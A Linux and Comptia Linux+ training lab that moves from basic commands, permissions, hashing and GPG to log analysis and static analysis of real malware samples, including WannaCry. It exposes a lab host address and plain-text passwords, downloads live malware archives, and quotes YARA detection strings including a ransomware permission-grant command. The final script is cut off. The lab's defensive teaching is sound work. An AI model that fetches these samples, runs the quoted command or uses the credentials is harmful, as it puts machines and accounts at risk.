joemccray
PMRF Linux Basics
Jul 9th, 2019
#####################################################
# PMRF Intro to Linux & Comptia Linux+ Exam Prep    #
# By Joe McCray                                     #
#####################################################

- Here is a good set of slides for getting started with Linux:
http://www.slideshare.net/olafusimichael/linux-training-24086319


- Here is a good tutorial that you should complete before doing the labs below:
http://linuxsurvival.com/linux-tutorial-introduction/


- I prefer to use PuTTY to SSH into my Linux host.
- You can download PuTTY from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Here is the information to put into PuTTY

Host Name: 45.32.217.27
protocol: ssh
port: 22
username: pmrf
password:

- The first time you connect, PuTTY shows the server's host key fingerprint and asks whether to trust it. Compare it with the fingerprint your instructor gives you before you accept it: accepting an unknown host key is exactly how a man-in-the-middle ends up with your password.


########################
# Basic Linux Commands #
########################

---------------------------Type This-----------------------------------
cd ~

pwd

whereis pwd

which pwd

sudo find / -name pwd

/bin/pwd

mkdir yourname <---- replace 'yourname' with your first name in lowercase with no spaces or special characters please

cd yourname <---- replace 'yourname' with your first name in lowercase with no spaces or special characters please

touch one two three

ls -l t (without pressing the Enter key, press the Tab key twice. What happens?)

h (and again without pressing the Enter key, press the Tab key twice. What happens?)

Press the 'Up arrow key' (What happens?)

Press 'Ctrl-A' (What happens?)

ls

clear (What happens?)

echo one > one

cat one (What happens?)

man cat (What happens?)
q

cat two

cat one > two

cat two

cat one two > three

cat three

echo four >> three

cat three (What happens?)

wc -l three

man wc
q

info wc
q

cat three | grep four

cat three | grep one

man grep
q


man ps
q

ps

ps aux

ps aux | less

Press the 'Up arrow key' (What happens?)

Press the 'Down arrow key' (What happens?)
q

top
q
-----------------------------------------------------------------------


#########
# Files #
#########
---------------------------Type This-----------------------------------
cd ~

pwd

cd ~/yourname/

pwd

ls

mkdir LinuxBasics

cd LinuxBasics

pwd

ls

mkdir files

cp ../one files/    <---- 'one' lives in ~/yourname, one level up from LinuxBasics, so the relative path needs the ../

ls files/

cd files/

cp ../../two .      <---- two levels up now: files -> LinuxBasics -> yourname

ls

cp ../../three .

ls

tar cvf files.tar *

ls

gzip files.tar

ls

rm -rf one two three    <---- -rf is not needed for plain files; get in the habit of reserving it for directories you really mean to delete

ls

tar -zxvf files.tar.gz

rm -rf files.tar.gz

zip data *

unzip -l data.zip       <---- always list an archive before extracting it: entries with absolute paths or ../ in them can write outside the directory you extract into

mkdir /tmp/yourname/

unzip data.zip -d /tmp/yourname/
-----------------------------------------------------------------------



############
# VIM Demo #
############
---------------------------Type This-----------------------------------
cd ~/yourname/LinuxBasics

mkdir vimlesson

cd vimlesson

vi lesson1.sh

i (press "i" to get into INSERT mode and then paste in the lines below)

#!/bin/bash

echo "This is my first time using vi to create a shell script"
echo " "
echo " "
echo " "
sleep 5
echo "Ok, now let's clear the screen"
sleep 3
clear


---------------don't put this line in your script----------------------------

ESC (press the ESC key to get you out of INSERT mode)

[SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen; this is command mode)


wq (typing "wq" immediately after SHIFT: will save (w for write) and quit (q for quit, meaning exit vim))



vi lesson1.sh

[SHIFT+:] (command mode again; the : appears in the bottom left corner)

set number (typing "set number" immediately after SHIFT: will add line numbers to vim)

[SHIFT+:]

wq




vi lesson1.sh

[SHIFT+:]

set number


/echo (searching does not use the colon: from normal mode press / and then type echo and press Enter. vim searches forward for the word echo; press n to jump to the next match and N to go back to the previous one.)

[SHIFT+:]

wq




vi lesson1.sh

[SHIFT+:]

set number


[SHIFT+:]

4 (typing "4" immediately after SHIFT: will take you to line number 4)

[SHIFT+:]

wq




vi lesson1.sh

[SHIFT+:]

set number


[SHIFT+:]

4

dd (typing "dd" in normal mode will delete the line that you are on; u undoes it if you deleted the wrong line)

[SHIFT+:]

wq




vi lesson1.sh

[SHIFT+:]

set number


[SHIFT+:]

4

dd

[SHIFT+:]

syntax on (typing "syntax on" immediately after SHIFT: will turn on syntax highlighting; this needs the full vim package, the vim-tiny build that some distributions ship as vi does not support it)

[SHIFT+:]

set tabstop=5 (typing "set tabstop=5" immediately after SHIFT: makes vim display each tab character 5 columns wide. It does not turn tabs into spaces; "set expandtab" does that.)

[SHIFT+:]

wq




vi ~/.vimrc    <---- vim reads its settings from .vimrc in your home directory, so create the file there, not inside vimlesson
i (press "i" to get into INSERT mode and then paste in the lines below)


set number
syntax on
set tabstop=5

ESC (press the ESC key to get you out of INSERT mode)

[SHIFT+:]

wq






vi lesson1.sh (line numbers, highlighting and the tab width are now on without typing anything)

[SHIFT+:]

echo $MYVIMRC (typing "echo $MYVIMRC" immediately after SHIFT: will display the path of the vimrc file vim loaded at startup, which should now be your new ~/.vimrc)

[SHIFT+:]

wq
-----------------------------------------------------------------------








###############
# Permissions #
###############
---------------------------Type This-----------------------------------
cd ~/yourname     <---- 'one' is in ~/yourname (and a copy in LinuxBasics/files), not in LinuxBasics itself

ls -l one
-----------------------------------------------------------------------
We can determine a lot from examining the results of this command. The first column is the mode: ten characters, the file type followed by three rwx triplets for the owner, the group and everybody else. The file "one" is owned by the user you are logged in as (pmrf on the lab host).
That user has the right to read and write this file.
The file is owned by that user's group. Whether the group triplet includes w depends on the umask the file was created under (type umask to see yours); with the common 022 the group can only read it.
Everybody else can read this file.


---------------------------Type This-----------------------------------
ls -l /bin/bash
-----------------------------------------------------------------------

Here we can see:

The file "/bin/bash" is owned by user "root". The superuser has the right to read, write, and execute this file.
The file is owned by the group "root". Members of the group "root" can also read and execute this file. Everybody else can read and execute this file.


The next command you need to know is "chmod"
rwx rwx rwx = 111 111 111
rw- rw- rw- = 110 110 110
rwx --- --- = 111 000 000

and so on...

rwx = 111 in binary = 7
rw- = 110 in binary = 6
r-x = 101 in binary = 5
r-- = 100 in binary = 4
-wx = 011 in binary = 3
-w- = 010 in binary = 2
--x = 001 in binary = 1
--- = 000 in binary = 0

The three digits are written in the order owner, group, others, so chmod 640 means rw- for the owner, r-- for the group and --- for everybody else.


---------------------------Type This-----------------------------------
ls -l one

chmod 600 one

ls -l one

sudo useradd -m testuser   <---- the rest of this lab uses testuser, so create that account; -m gives it a home directory
aegisweaponssystem         <---- the sudo password for the lab host, typed at the [sudo] password prompt


sudo passwd testuser

P@$$w0rd321
P@$$w0rd321

sudo chown testuser one
aegisweaponssystem

ls -l one

sudo chgrp testuser one
aegisweaponssystem

ls -l one

id

su testuser
P@$$w0rd321

id         <---- you are testuser now; the file is yours even though its mode is 600

exit       <---- back to your own shell before continuing, otherwise the later sudo commands run as testuser
-----------------------------------------------------------------------

Here is a table of numbers that covers all the common settings. The ones beginning with "7" are used with programs (since they enable execution) and the rest are for other kinds of files.

Value Meaning
777 (rwxrwxrwx) No restrictions on permissions. Anybody may do anything. Generally not a desirable setting.

755 (rwxr-xr-x) The file's owner may read, write, and execute the file. All others may read and execute the file. This setting is common for programs that are used by all users.

700 (rwx------) The file's owner may read, write, and execute the file. Nobody else has any rights. This setting is useful for programs that only the owner may use and must be kept private from others.

666 (rw-rw-rw-) All users may read and write the file.

644 (rw-r--r--) The owner may read and write a file, while all others may only read the file. A common setting for data files that everybody may read, but only the owner may change.

600 (rw-------) The owner may read and write a file. All others have no rights. A common setting for data files that the owner wants to keep private. The ssh client refuses to use a private key file that other users can read, so this is the mode for ~/.ssh/id_rsa and friends.



Directory permissions
---------------------
The chmod command can also be used to control the access permissions for directories. In most ways, the permissions scheme for directories works the same way as it does with files. However, the three bits mean slightly different things on a directory: r lets you list the names in it, w lets you create, rename and delete entries in it (regardless of who owns the files themselves), and x lets you enter the directory and reach the files inside it. Without x you cannot cd into a directory or open anything in it, even if you have r. Here are some useful settings for directories:

Value Meaning
777 (rwxrwxrwx) No restrictions on permissions.
Anybody may list files, create new files in the directory and delete files in the directory.
Generally not a good setting.



755 (rwxr-xr-x) The directory owner has full access.
All others may list the directory, but cannot create files nor delete them.
This setting is common for directories that you wish to share with other users.



700 (rwx------) The directory owner has full access. Nobody else has any rights. This setting is useful for directories that only the owner may use and must be kept private from others.

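As an added example (not part of the original lab), here is a small POSIX shell script that turns the octal/rwx table above into code: it converts in both directions, reads a file's mode string back out of ls -l after a chmod the way the lab does, and uses find to audit a directory for world-writable files, which is the check behind the warning that 777 and 666 are "generally not desirable". The temporary files and directory it creates are its own; nothing here touches the lab's 'one' file, and the setuid/setgid/sticky bits are left out on purpose.

```shell
#!/bin/sh
# Added example: octal <-> rwx conversion and a chmod/find check.
# Special bits (setuid, setgid, sticky) are deliberately left out.

# One octal digit (0-7) -> its rwx triplet, e.g. 6 -> rw-
digit_to_rwx() {
    case "$1" in
        0) printf '%s' '---' ;;  1) printf '%s' '--x' ;;
        2) printf '%s' '-w-' ;;  3) printf '%s' '-wx' ;;
        4) printf '%s' 'r--' ;;  5) printf '%s' 'r-x' ;;
        6) printf '%s' 'rw-' ;;  7) printf '%s' 'rwx' ;;
        *) return 1 ;;
    esac
}

# Three-digit mode -> nine-character string, e.g. 644 -> rw-r--r--
mode_to_rwx() {
    m=$1
    [ "${#m}" -eq 3 ] || return 1
    o=${m%??}; g=${m#?}; g=${g%?}; w=${m#??}
    printf '%s%s%s\n' "$(digit_to_rwx "$o")" "$(digit_to_rwx "$g")" "$(digit_to_rwx "$w")"
}

# One rwx triplet -> octal digit: r=4, w=2, x=1, added together
triplet_to_digit() {
    d=0
    case "$1" in r??) d=$((d + 4)) ;; esac
    case "$1" in ?w?) d=$((d + 2)) ;; esac
    case "$1" in ??x) d=$((d + 1)) ;; esac
    printf '%d' "$d"
}

# Nine-character string -> three-digit mode, e.g. rwxr-xr-x -> 755
rwx_to_mode() {
    s=$1
    [ "${#s}" -eq 9 ] || return 1
    printf '%s%s%s\n' \
        "$(triplet_to_digit "$(printf '%s' "$s" | cut -c1-3)")" \
        "$(triplet_to_digit "$(printf '%s' "$s" | cut -c4-6)")" \
        "$(triplet_to_digit "$(printf '%s' "$s" | cut -c7-9)")"
}

# The nine permission characters of a path, taken from ls -l
# (column 1 is the file type, columns 2-10 are owner/group/other).
file_mode_string() {
    ls -ld "$1" | cut -c2-10
}

# chmod a fresh temporary file to the requested mode and read the
# result back the way the lab does, with ls -l.
chmod_roundtrip() {
    tmp=$(mktemp) || return 1
    chmod "$1" "$tmp"
    file_mode_string "$tmp"
    rm -f "$tmp"
}

# Audit: regular files under a directory that anybody may write to
# (the 666/777 cases above). -perm -0002 means "the other-write bit is set".
world_writable_files() {
    find "$1" -type f -perm -0002
}

# Self-contained demo of the audit on a throwaway directory.
world_writable_demo() {
    d=$(mktemp -d) || return 1
    : > "$d/private";  chmod 600 "$d/private"
    : > "$d/shared";   chmod 644 "$d/shared"
    : > "$d/loose";    chmod 666 "$d/loose"
    world_writable_files "$d" | sed "s|^$d/||"
    rm -rf "$d"
}
```

world_writable_files is the one to remember: run it against /etc, a web root or a home directory and anything it prints is a file an attacker with any local account could modify.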
######################
# Process Management #
######################
---------------------------Type This-----------------------------------
top
q

htop        <---- not installed by default on every distribution; sudo apt-get install htop if it is missing
q

ps

ps aux

ps -A

ps -A | less

ps axjf

pstree

pstree -A

pgrep bash

pgrep init  <---- on a systemd distribution PID 1 is named systemd, so this prints nothing; try pgrep systemd or ps -p 1

ps aux | grep apache
-----------------------------------------------------------------------



You can list all of the signals that are possible to send with kill by typing:
---------------------------Type This-----------------------------------
kill -l

sudo kill -HUP pid_of_apache    <---- replace pid_of_apache with the PID from the ps output above; SIGHUP makes apache re-read its configuration rather than exit

The pkill command works in almost exactly the same way as kill, but it operates on a process name instead:

pkill -9 ping
The above command is the equivalent of:

kill -9 `pgrep ping`
-----------------------------------------------------------------------
Two things to keep in mind before killing by name: pgrep and pkill treat the name as a regular expression matched anywhere in the process name, so "ping" also matches any process whose name merely contains ping (use -x for an exact match, or -f to match against the full command line), and -9 (SIGKILL) cannot be caught, so the process gets no chance to clean up. Try plain kill (SIGTERM) first and reach for -9 only when that doesn't work.




################
# Hashing Demo #
################
---------------------------Type This-----------------------------------
cd ~/yourname/LinuxBasics

mkdir hashdemo

cd hashdemo

echo test > test.txt

cat test.txt

md5sum test.txt

echo hello >> test.txt

cat test.txt

md5sum test.txt

echo test2 > test2.txt

cat test2.txt

sha256sum test2.txt

echo hello >> test2.txt

cat test2.txt

sha256sum test2.txt

cd ..
-----------------------------------------------------------------------
Notice that appending one word changes the whole digest. That is the point of a hash: a file can be compared with a known-good digest without keeping a copy of the file around. Prefer sha256sum for anything security-related: MD5 collisions are cheap to produce today, so two different files can be made to share an MD5 sum, and MD5 belongs only where a legacy tool demands it.


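The lab shows a hash changing when a file changes; what a practitioner does with that is keep a manifest of known-good digests and re-check it later. As an added example (not the lab's code), the script below builds a sha256sum manifest of a directory, then verifies it with sha256sum -c and reports which files no longer match. It assumes GNU coreutils sha256sum (present on the lab host and most Linux distributions) and creates only its own temporary files.

```shell
#!/bin/sh
# Added example: integrity manifest with sha256sum.

# Write "digest  ./relative/path" lines for every regular file under $1,
# sorted so two manifests of the same tree are byte-for-byte comparable.
make_manifest() {
    ( cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k2 )
}

# Re-hash the tree and compare with a saved manifest. Prints the path of
# every file whose digest changed (or that is missing); returns 1 if any
# did, 0 when the tree is intact.
verify_manifest() {
    dir=$1; manifest=$2
    failed=$( cd "$dir" && sha256sum -c "$manifest" 2>/dev/null | sed -n 's/: FAILED.*$//p' )
    if [ -n "$failed" ]; then
        printf '%s\n' "$failed"
        return 1
    fi
    return 0
}

# Demo on a throwaway tree: three files, a manifest, then tamper with one
# (the "echo four >> three" step from the lab, on a different file).
manifest_demo() {
    d=$(mktemp -d) || return 1
    printf 'one\n'   > "$d/one"
    printf 'two\n'   > "$d/two"
    printf 'three\n' > "$d/three"
    make_manifest "$d" > "$d.sha256"

    printf 'four\n' >> "$d/two"
    verify_manifest "$d" "$d.sha256" || :   # prints ./two, the tampered path
    rm -rf "$d" "$d.sha256"
}
```

A manifest is only as trustworthy as its storage: an attacker who can change the file can usually change a manifest sitting next to it, so keep it elsewhere or sign it (gpg --sign, see the next demo) and diff yesterday's against today's.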
#################################
# Symmetric Key Encryption Demo #
#################################
---------------------------Type This-----------------------------------
cd ~/yourname/LinuxBasics

mkdir gpgdemo

cd gpgdemo

echo test > test.txt

cat test.txt

gpg -c test.txt
password
password

ls | grep test

cat test.txt

cat test.txt.gpg

rm -rf test.txt

ls | grep test

gpg -o output.txt test.txt.gpg
password

cat output.txt
-----------------------------------------------------------------------
gpg -c (--symmetric) derives the key from the passphrase, so the ciphertext is exactly as strong as the passphrase. Older GnuPG releases default to CAST5 for -c; pass --cipher-algo AES256 to choose the cipher explicitly. Note also that gpg -c leaves the plaintext where it was: the rm above is what actually removes it.



#########################################################################################################################
# Asymmetric Key Encryption Demo                                                                                        #
#                                                                                                                       #
# Configure random number generator                                                                                     #
# https://www.howtoforge.com/helping-the-random-number-generator-to-gain-enough-entropy-with-rng-tools-debian-lenny    #
#########################################################################################################################
---------------------------Type This-----------------------------------
cd ~/yourname/LinuxBasics/gpgdemo

echo hello > file1.txt

echo goodbye > file2.txt

echo green > file3.txt

echo blue > file4.txt

tar czf files.tar.gz *.txt

gpg --gen-key
1
1024
0
y
John Doe
john@doe.com
--blank comment--
O
password
password

(The answers above follow the GnuPG 1.4/2.0 prompts: 1 = RSA and RSA, 1024 = key size, 0 = never expires, then name, email, comment, O for okay and the passphrase. GnuPG 2.1 and later only asks for name, email and passphrase with --gen-key; use --full-gen-key to see the algorithm and size questions. Whatever the version, do not pick 1024: RSA-1024 is below every current minimum, choose 3072 or 4096.)


gpg --armor --output file-enc-pubkey.txt --export 'John Doe'

cat file-enc-pubkey.txt

gpg --armor --output file-enc-privkey.asc --export-secret-keys 'John Doe'

cat file-enc-privkey.asc    <---- this is the private key; the only reason to export it is a backup, and that backup needs 600 permissions and a safe place

gpg --encrypt --recipient 'John Doe' files.tar.gz

rm -rf files.tar.gz *.txt

ls

tar -zxvf files.tar.gz.gpg  <---- this fails on purpose: the .gpg file is ciphertext, not a gzip archive

gpg --output output.tar.gz --decrypt files.tar.gz.gpg
password

tar -zxvf output.tar.gz

ls
-----------------------------------------------------------------------



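Both GPG demos above are interactive. For scripts, and for repeating the lab on your own machine, here is an added example (mine, not the lab's) that runs the same symmetric and asymmetric round trips non-interactively with GnuPG 2.2 or later: it works inside a throwaway GNUPGHOME so it cannot touch your real keyring, names AES256 explicitly, generates an RSA-3072 key instead of the 1024-bit one the prompts above suggest, and checks that what comes out of --decrypt is byte-identical to what went in. The passphrase is a placeholder and the user ID is the lab's John Doe; if gpg is not installed the function says so and does nothing else.

```shell
#!/bin/sh
# Added example: scripted GnuPG symmetric + asymmetric round trip.
# Requires gpg 2.2+ (--pinentry-mode loopback and --quick-generate-key).

PASS='correct horse battery staple'      # placeholder passphrase
UID_='John Doe <john@doe.com>'           # same test identity as the lab

# Encrypt $1 to $2 with a passphrase-derived key (the gpg -c demo, scripted).
sym_encrypt() {
    printf '%s' "$PASS" | gpg --batch --yes --quiet --pinentry-mode loopback \
        --passphrase-fd 0 --cipher-algo AES256 --symmetric -o "$2" "$1"
}

sym_decrypt() {
    printf '%s' "$PASS" | gpg --batch --yes --quiet --pinentry-mode loopback \
        --passphrase-fd 0 -o "$2" --decrypt "$1"
}

# Create an unprotected RSA-3072 keypair for $UID_ in the current GNUPGHOME
# (cert+sign primary plus an encryption subkey, which is what "default" means).
gen_key() {
    gpg --batch --yes --quiet --pinentry-mode loopback --passphrase '' \
        --quick-generate-key "$UID_" rsa3072 default 0
}

# Encrypt $1 to the recipient's public key. --trust-model always skips the
# web-of-trust prompt, which is fine for a key we generated ourselves a
# moment ago and would not be fine for a key somebody sent us.
asym_encrypt() {
    gpg --batch --yes --quiet --trust-model always \
        --recipient "$UID_" --encrypt -o "$2" "$1"
}

asym_decrypt() {
    gpg --batch --yes --quiet --pinentry-mode loopback --passphrase '' \
        -o "$2" --decrypt "$1"
}

# Full round trip in an isolated keyring. Prints OK on success.
gpg_roundtrip() {
    command -v gpg >/dev/null 2>&1 || { printf '%s\n' 'gpg not installed'; return 0; }
    (
        set -e
        GNUPGHOME=$(mktemp -d); export GNUPGHOME
        chmod 700 "$GNUPGHOME"                   # gpg warns about a looser directory
        cd "$GNUPGHOME"
        printf 'test\n' > test.txt

        sym_encrypt test.txt test.txt.gpg
        sym_decrypt test.txt.gpg sym.out
        cmp -s test.txt sym.out                  # plaintext must survive the trip

        gen_key
        asym_encrypt test.txt test.txt.asc
        asym_decrypt test.txt.asc asym.out
        cmp -s test.txt asym.out

        gpgconf --kill all >/dev/null 2>&1 || true   # stop the agent started in this home
        cd / && rm -rf "$GNUPGHOME"
        printf 'OK\n'
    )
}
```

The --passphrase '' key is only acceptable because the whole keyring is thrown away at the end; a key you keep gets a real passphrase, and a key used by an unattended service gets a restricted GNUPGHOME and 700 permissions instead.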
##############################################
# Log Analysis with Linux command-line tools #
##############################################
- The following command line executables are found on the Mac as well as in most Linux distributions.

cat – prints the content of a file in the terminal window
grep – searches and filters based on patterns
awk – splits each line into fields and displays only what is needed
sed – performs find and replace functions
sort – arranges output in an order
uniq – compares adjacent lines and can report, filter or provide a count of duplicates (which is why the input has to be sorted first)



##############
# Cisco Logs #
##############
---------------------------Type This-----------------------------------
wget https://s3.amazonaws.com/infosecaddictsfiles/cisco.log
-----------------------------------------------------------------------


AWK Basics
----------
- To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
---------------------------Type This-----------------------------------
cat cisco.log | awk '{print $5}' | tail -n 4
-----------------------------------------------------------------------


- Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in "$5", group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through "sort", using "uniq -c" to count the like entries, then using "sort -rn" to sort it in reverse numeric order.
---------------------------Type This-----------------------------------
cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
-----------------------------------------------------------------------


- While that's sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren't conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This ensures that we are at least looking at lines of text that contain a "%FACILITY-SEVERITY-MNEMONIC" tag. Quote the pattern: unquoted, the shell would try to expand the * and [ ] characters as filename globs before grep ever saw them.
---------------------------Type This-----------------------------------
cat cisco.log | grep '%[a-zA-Z]*-[0-9]-[a-zA-Z]*' | awk '{print $5}' | sort | uniq -c | sort -rn
-----------------------------------------------------------------------


- Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
---------------------------Type This-----------------------------------
cat cisco.log | grep %LINEPROTO-5-UPDOWN:

cat cisco.log | grep %LINEPROTO-5-UPDOWN: | awk '{print $10}' | sort | uniq -c | sort -rn

cat cisco.log | grep %LINEPROTO-5-UPDOWN: | sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn

cat cisco.log | grep %LINEPROTO-5-UPDOWN: | sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
-----------------------------------------------------------------------
- The field numbers ($5, $10, $14) depend on this log's exact layout; if a device adds or drops a field (a sequence number, a timezone), every number shifts. Anchoring on the message text itself with a regular expression is more robust than counting columns.


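As an added example (not part of the lab), here is the same pipeline as a shell script you can run without cisco.log: it embeds a handful of constructed Cisco-style syslog lines, pulls the %FACILITY-SEVERITY-MNEMONIC tag out with a regular expression instead of trusting it to be word 5, and counts interface state changes by matching the message text rather than columns 10 and 14. The sample lines, addresses and interface names are made up. Sorting is by count first and text second so the output is stable, which matters when you diff today's counts against yesterday's.

```shell
#!/bin/sh
# Added example: counting syslog tags and interface flaps with sed/sort/uniq.

# Constructed sample in the Cisco IOS syslog shape used by cisco.log;
# the addresses, interfaces and sequence numbers are invented.
sample_log() {
    cat <<'EOF'
Sep 10 10:00:01 10.1.1.1 120: *Sep 10 10:00:01.123: %LINK-3-UPDOWN: Interface GigabitEthernet0/1, changed state to down
Sep 10 10:00:02 10.1.1.1 121: *Sep 10 10:00:02.456: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to down
Sep 10 10:00:09 10.1.1.1 122: *Sep 10 10:00:09.001: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to up
Sep 10 10:01:15 10.1.1.1 123: *Sep 10 10:01:15.700: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.1.1.50)
Sep 10 10:02:30 10.1.1.1 124: *Sep 10 10:02:30.250: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/2, changed state to down
Sep 10 10:02:31 10.1.1.1 125: message repeated 2 times
Sep 10 10:03:00 10.1.1.1 126: *Sep 10 10:03:00.010: %SEC-6-IPACCESSLOGP: list 101 denied tcp 10.1.1.9(4444) -> 10.1.1.1(22), 1 packet
Sep 10 10:03:40 10.1.1.1 127: *Sep 10 10:03:40.900: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to down
EOF
}

# "count thing" lines, highest count first, ties broken alphabetically.
count_sorted() {
    LC_ALL=C sort | uniq -c | awk '{ c=$1; $1=""; sub(/^ /, ""); print c " " $0 }' \
        | LC_ALL=C sort -k1,1nr -k2
}

# Extract the %FACILITY-SEVERITY-MNEMONIC tag from each line that has one.
# Lines without a tag (the "message repeated" line) are dropped, which is
# the job the grep in the lab does.
tags() {
    sed -n 's/.*\(%[A-Z0-9_]*-[0-7]-[A-Z0-9_]*\):.*/\1/p'
}

count_tags() {
    tags | count_sorted
}

# Interface state changes from %LINEPROTO-5-UPDOWN lines, as
# "<interface> changed to <state>", counted. Anchors on the message text,
# so it survives extra or missing leading fields.
interface_changes() {
    grep '%LINEPROTO-5-UPDOWN:' \
        | sed -n 's/.*Interface \([^,]*\), changed state to \([a-z]*\).*/\1 changed to \2/p' \
        | count_sorted
}
```

Run it as `sample_log | count_tags` or, on the real file, `count_tags < cisco.log`. The severity digit in the tag (0 emergencies to 7 debugging) is worth a sort of its own: a burst of 3s and 4s on a device that normally logs only 5s and 6s is the kind of change that deserves a look.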
################
# The Scenario #
################
You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).


The fastest thing you can do is perform static analysis.



###################
# Static Analysis #
###################

- After logging in, please open a terminal window and type the following commands:
---------------------------Type This-----------------------------------
cd Desktop/
-----------------------------------------------------------------------

- This is actual malware (remember to run it in a VM; the password to extract it is 'infected'):

---------------------------Type This-----------------------------------
cd ~/Desktop/
wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip --no-check-certificate
wget https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py --no-check-certificate

unzip malware-password-is-infected.zip
infected

file malware.exe

mv malware.exe malware.pdf

file malware.pdf

mv malware.pdf malware.exe

hexdump -n 2 -C malware.exe
-----------------------------------------------------------------------
- file identifies the type from the content, not from the name, which is why the rename changes nothing. --no-check-certificate switches off TLS certificate validation; it is tolerable for pulling a sample into a throwaway VM, but do not let it become a habit.


***What is '4d 5a' or 'MZ'***
Reference:
http://www.garykessler.net/library/file_sigs.html

---------------------------Type This-----------------------------------
objdump -x malware.exe

strings malware.exe

strings --all malware.exe | head -n 6

strings malware.exe | grep -i dll

strings malware.exe | grep -i library

strings malware.exe | grep -i reg

strings malware.exe | grep -i hkey

strings malware.exe | grep -i hku
-----------------------------------------------------------------------
- We didn't see anything like HKLM, HKCU or other registry type stuff
- Keep in mind that strings only finds ASCII by default. Windows binaries keep a lot of their text as UTF-16, which strings -e l (16-bit little-endian) shows and the default run silently misses.


---------------------------Type This-----------------------------------
strings malware.exe | grep -i irc

strings malware.exe | grep -i join

strings malware.exe | grep -i admin

strings malware.exe | grep -i list
-----------------------------------------------------------------------

- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands

---------------------------Type This-----------------------------------
sudo apt-get install -y python-pefile
malware                        <---- the sudo password on this VM

vi analyse_malware.py          <---- read it before you run it, as you would with anything you just downloaded

python analyse_malware.py malware.exe
-----------------------------------------------------------------------
- python-pefile is the Python 2 package name; current distributions ship python3-pefile (or pip install pefile) instead, and a script written for Python 2 may need small changes to run under python3.




################################
# Good references for WannaCry #
################################

References:

https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html



- After logging in, please open a terminal window and type the following commands:
---------------------------Type This-----------------------------------
cd Desktop/

wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip

unzip wannacry.zip
infected

file wannacry.exe

mv wannacry.exe malware.pdf

file malware.pdf

mv malware.pdf wannacry.exe

hexdump -n 2 -C wannacry.exe
-----------------------------------------------------------------------



***What is '4d 5a' or 'MZ'***
Reference:
http://www.garykessler.net/library/file_sigs.html




---------------------------Type This-----------------------------------
objdump -x wannacry.exe

strings wannacry.exe

strings --all wannacry.exe | head -n 6

strings wannacry.exe | grep -i dll

strings wannacry.exe | grep -i library

strings wannacry.exe | grep -i reg

strings wannacry.exe | grep -i key

strings wannacry.exe | grep -i rsa

strings wannacry.exe | grep -i open

strings wannacry.exe | grep -i get

strings wannacry.exe | grep -i mutex

strings wannacry.exe | grep -i irc

strings wannacry.exe | grep -i join

strings wannacry.exe | grep -i admin

strings wannacry.exe | grep -i list
-----------------------------------------------------------------------



Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"

Quick Google search for "wannacry ransomware analysis"


Reference
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/

- Yara Rule -


Strings:
$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
$s2 = "Wanna Decryptor" wide ascii nocase
$s3 = ".wcry" wide ascii nocase
$s4 = "WANNACRY" wide ascii nocase
$s5 = "WANACRY!" wide ascii nocase
$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase

(The web page this was copied from renders the quotes as curly quotes; a YARA file needs plain double quotes. "wide" means the string is also matched in its UTF-16 form, which is why strings -e l matters for Windows samples, and "nocase" is why grep -i is used below.)


Ok, let's look for the individual strings


---------------------------Type This-----------------------------------
strings wannacry.exe | grep -i ooops

strings wannacry.exe | grep -i wanna

strings wannacry.exe | grep -i wcry

strings wannacry.exe | grep -i wannacry

strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
-----------------------------------------------------------------------



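hexdump -n 2 shows the MZ magic and file goes a step further. As an added example (not the lab's code, and run on a constructed file rather than a real sample), the script below does by hand what file does for a Windows executable: it checks for MZ, reads the little-endian e_lfanew pointer at offset 0x3c, confirms the PE\0\0 signature there, and reads the Machine field that follows it. It builds its own minimal MZ/PE header with printf so you can run it without malware on the box; that header is just the handful of bytes these checks need, not a loadable executable. The same steps are why renaming malware.exe to malware.pdf changes nothing: none of this looks at the name.

```shell
#!/bin/sh
# Added example: manual MZ/PE header checks with od (what file/hexdump show).

# Hex of $2 bytes at offset $1 of file $3, as one string, e.g. "4d5a".
hex_at() {
    od -An -v -tx1 -j "$1" -N "$2" "$3" 2>/dev/null | tr -d ' \n'
}

# Little-endian 32-bit unsigned integer at offset $1 of file $2 (0 if short).
le32_at() {
    set -- $(od -An -v -tx1 -j "$1" -N 4 "$2" 2>/dev/null)
    [ $# -eq 4 ] || { printf '0'; return; }
    printf '%d' $(( (0x$4 << 24) | (0x$3 << 16) | (0x$2 << 8) | 0x$1 ))
}

# Classify a file by content: "not-mz", "mz-no-pe" (a DOS-era or damaged
# file) or "pe <machine>" when the NT signature is found at e_lfanew.
classify_pe() {
    f=$1
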